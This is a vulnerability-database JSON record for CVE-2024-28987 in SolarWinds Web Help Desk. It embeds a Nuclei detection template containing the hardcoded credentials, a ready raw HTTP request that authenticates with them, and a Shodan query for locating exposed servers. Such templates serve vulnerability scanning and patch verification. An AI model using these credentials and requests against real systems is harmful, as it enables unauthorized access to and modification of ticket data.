{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-28987/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-28987/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-28987/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-28987/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-28987/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-28987"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-28987"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-28987.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-28987\n\ninfo:\n  name: SolarWinds Web Help Desk - Hardcoded Credential\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.\n  impact: |\n    Attackers with knowledge of the hardcoded credentials can gain unauthorized access to the SolarWinds Web Help Desk system.\n  remediation: |\n    Update SolarWinds Web Help Desk to a version that removes the hardcoded credentials.\n  reference:\n    - https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2\n    - https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-28987\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2024-28987\n    cwe-id: CWE-798\n    epss-score: 0.93299\n    epss-percentile: 0.99833\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:1895809524\n  tags: cve,cve2024,exposure,solarwinds,help-desk,kev,vkev,vuln\n\nvariables:\n  username: \"helpdeskIntegrationUser\"\n  password: \"dev-C4F8025E7\"\n\nhttp:\n  - raw:\n      - |\n        GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic {{base64(username+':'+password)}}\n        Content-Type: application/x-www-form-urlencoded\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - displayClient\n          - shortDetail\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100d3a560e2f0aa2bea4b91453dd3351771dc3c61be3799025ab5e95ca1cc6b29b602210084433cc91c4ae68ee177b48d1f47902886de4aa570ada83e83726dcbc6a99dcb:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-28987"
}